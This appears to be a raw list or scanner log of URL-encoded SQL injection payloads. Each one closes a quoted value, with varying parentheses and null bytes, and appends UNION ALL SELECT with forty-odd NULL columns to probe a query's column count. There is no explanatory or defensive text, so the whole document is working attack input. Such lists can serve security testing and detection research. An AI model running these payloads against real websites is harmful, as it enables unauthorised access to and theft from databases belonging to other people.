1%25%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%25%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%25%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%25%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%25%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%25%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%25%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%25%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%25%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%25%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%25%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%25%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%25%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%25%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%25%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%25%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%25%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%25%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%25%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%25%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%25%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%25%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%25%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%25%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%25%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%25%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%25%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%25%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%25%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%25%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%25%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%25%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%25%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%25%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%25%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%25%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%00%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%00%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%00%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%00%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%00%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%00%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%00%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%00%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%00%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%00%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%00%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%00%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%00%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%00%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 